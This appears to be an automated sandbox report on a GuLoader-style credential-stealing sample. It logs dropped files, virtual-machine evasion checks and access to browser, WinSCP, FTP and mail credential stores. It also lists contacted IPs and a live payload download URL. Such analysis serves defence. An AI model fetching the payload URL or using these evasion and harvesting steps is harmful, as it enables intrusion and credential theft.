Source: C:\Users\user\Desktop\99200032052824.bat.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Bemangle\parsleywort\Quizs\Strand\podagrist.ref Jump to behavior
Source: C:\Users\user\Desktop\99200032052824.bat.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Bemangle\parsleywort\Quizs\Strand\soliloquium.bor Jump to behavior
Source: C:\Users\user\Desktop\99200032052824.bat.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Bemangle\parsleywort\Quizs\Strand\thoroughwort.ret Jump to behavior
Source: C:\Users\user\Desktop\99200032052824.bat.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Bemangle\parsleywort\Quizs\Strand\torminal.wes Jump to behavior
Source: C:\Users\user\Desktop\99200032052824.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\99200032052824.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\99200032052824.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\99200032052824.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\99200032052824.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\99200032052824.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\99200032052824.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\99200032052824.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\99200032052824.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\99200032052824.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\99200032052824.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\99200032052824.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\99200032052824.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\99200032052824.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\99200032052824.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\99200032052824.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\99200032052824.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\99200032052824.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\99200032052824.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\99200032052824.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\99200032052824.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\99200032052824.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\99200032052824.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\99200032052824.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\99200032052824.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\99200032052824.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\99200032052824.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\99200032052824.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\99200032052824.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\99200032052824.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\99200032052824.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\99200032052824.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\99200032052824.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\99200032052824.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\99200032052824.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\99200032052824.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\99200032052824.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\99200032052824.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\99200032052824.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\99200032052824.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\99200032052824.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\99200032052824.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\99200032052824.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\99200032052824.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\99200032052824.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\99200032052824.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\99200032052824.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\99200032052824.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\99200032052824.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\99200032052824.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\99200032052824.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\99200032052824.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion
barindex
Check if machine is in data center or colocation facility
Source: global traffic HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Source: C:\Users\user\Desktop\99200032052824.bat.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Source: C:\Users\user\Desktop\99200032052824.bat.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Allocates memory with a write watch (potentially for evading sandboxes)
Source: C:\Users\user\Desktop\99200032052824.bat.exe Memory allocated: 120000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\99200032052824.bat.exe Memory allocated: 37610000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\99200032052824.bat.exe Memory allocated: 37530000 memory reserve | memory write watch Jump to behavior
Found dropped PE file which has not been started or loaded
Source: C:\Users\user\Desktop\99200032052824.bat.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsvDCDA.tmp\System.dll Jump to dropped file
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Source: C:\Users\user\Desktop\99200032052824.bat.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Source: C:\Users\user\Desktop\99200032052824.bat.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Source: C:\Users\user\Desktop\99200032052824.bat.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\Desktop\99200032052824.bat.exe Code function: 5_2_00405768 GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose, 5_2_00405768
Source: C:\Users\user\Desktop\99200032052824.bat.exe Code function: 5_2_004062A3 FindFirstFileA,FindClose, 5_2_004062A3
Source: C:\Users\user\Desktop\99200032052824.bat.exe Code function: 5_2_004026FE FindFirstFileA, 5_2_004026FE
Source: C:\Users\user\Desktop\99200032052824.bat.exe Code function: 9_2_00405768 GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose, 9_2_00405768
Source: C:\Users\user\Desktop\99200032052824.bat.exe Code function: 9_2_004026FE FindFirstFileA, 9_2_004026FE
Source: C:\Users\user\Desktop\99200032052824.bat.exe Code function: 9_2_004062A3 FindFirstFileA,FindClose, 9_2_004062A3
Source: C:\Users\user\Desktop\99200032052824.bat.exe File opened: C:\Users\user\AppData\Roaming\Microsoft Jump to behavior
Source: C:\Users\user\Desktop\99200032052824.bat.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\99200032052824.bat.exe File opened: C:\Users\user\AppData Jump to behavior
Source: C:\Users\user\Desktop\99200032052824.bat.exe File opened: C:\Users\user Jump to behavior
Source: C:\Users\user\Desktop\99200032052824.bat.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows Jump to behavior
Source: C:\Users\user\Desktop\99200032052824.bat.exe File opened: C:\Users\user\AppData\Roaming Jump to behavior
Source: C:\Users\user\Desktop\99200032052824.bat.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\99200032052824.bat.exe API call chain: ExitProcess graph end node
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Users\user\Desktop\99200032052824.bat.exe Code function: 5_2_00402340 LdrInitializeThunk,GetPrivateProfileStringA, 5_2_00402340
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\99200032052824.bat.exe Code function: 5_2_73A31A98 GlobalAlloc,lstrcpyA,lstrcpyA,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GetModuleHandleA,LoadLibraryA,GetProcAddress,lstrlenA, 5_2_73A31A98
Enables debug privileges
Source: C:\Users\user\Desktop\99200032052824.bat.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\Desktop\99200032052824.bat.exe Memory allocated: page read and write | page guard Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\99200032052824.bat.exe Process created: C:\Users\user\Desktop\99200032052824.bat.exe "C:\Users\user\Desktop\99200032052824.bat.exe" Jump to behavior
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\Desktop\99200032052824.bat.exe Queries volume information: C:\Users\user\Desktop\99200032052824.bat.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\99200032052824.bat.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\99200032052824.bat.exe Code function: 5_2_0040320C EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,LdrInitializeThunk,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,LdrInitializeThunk,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess, 5_2_0040320C
Source: C:\Users\user\Desktop\99200032052824.bat.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Stealing of Sensitive Information
barindex
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Source: C:\Users\user\Desktop\99200032052824.bat.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions Jump to behavior
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Users\user\Desktop\99200032052824.bat.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini Jump to behavior
Source: C:\Users\user\Desktop\99200032052824.bat.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Source: C:\Users\user\Desktop\99200032052824.bat.exe File opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini Jump to behavior
Source: C:\Users\user\Desktop\99200032052824.bat.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data Jump to behavior
Source: C:\Users\user\Desktop\99200032052824.bat.exe File opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini Jump to behavior
Tries to harvest and steal ftp login credentials
Source: C:\Users\user\Desktop\99200032052824.bat.exe File opened: C:\FTP Navigator\Ftplist.txt Jump to behavior
Tries to steal Mail credentials (via file / registry access)
Source: C:\Users\user\Desktop\99200032052824.bat.exe File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini Jump to behavior
Source: C:\Users\user\Desktop\99200032052824.bat.exe File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini Jump to behavior
Source: C:\Users\user\Desktop\99200032052824.bat.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles Jump to behavior
Source: C:\Users\user\Desktop\99200032052824.bat.exe Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities Jump to behavior
Yara detected Credential Stealer
Source: Yara match File source: 00000009.00000002.1301032668397.0000000037647000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1447846 Sample: 99200032052824.bat.exe Startdate: 27/05/2024 Architecture: WINDOWS Score: 96 17 ip-api.com 2->17 23 Multi AV Scanner detection for submitted file 2->23 25 Yara detected GuLoader 2->25 27 Check if machine is in data center or colocation facility 2->27 29 Machine Learning detection for sample 2->29 7 99200032052824.bat.exe 2 49 2->7         started        signatures3 process4 file5 15 C:\Users\user\AppData\Local\...\System.dll, PE32 7->15 dropped 31 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 7->31 33 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 7->33 11 99200032052824.bat.exe 15 8 7->11         started        signatures6 process7 dnsIp8 19 ip-api.com 208.95.112.1, 50032, 80 TUT-ASUS United States 11->19 21 109.248.151.11, 50031, 80 DATACLUBLV Russian Federation 11->21 35 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 11->35 37 Tries to steal Mail credentials (via file / registry access) 11->37 39 Tries to harvest and steal ftp login credentials 11->39 41 Tries to harvest and steal browser information (history, passwords, etc) 11->41 signatures9
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
208.95.112.1
 ip-api.com United States
53334 TUT-ASUS true
109.248.151.11
 unknown Russian Federation
52048 DATACLUBLV false

Contacted Domains

Name IP Active
ip-api.com 208.95.112.1 true

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://109.248.151.11/LZJRCXHEEshk185.bin false
  • Avira URL Cloud: safe
 unknown
http://ip-api.com/line/?fields=hosting false
  • 0%, Virustotal, Browse
  • Avira URL Cloud: safe
 unknown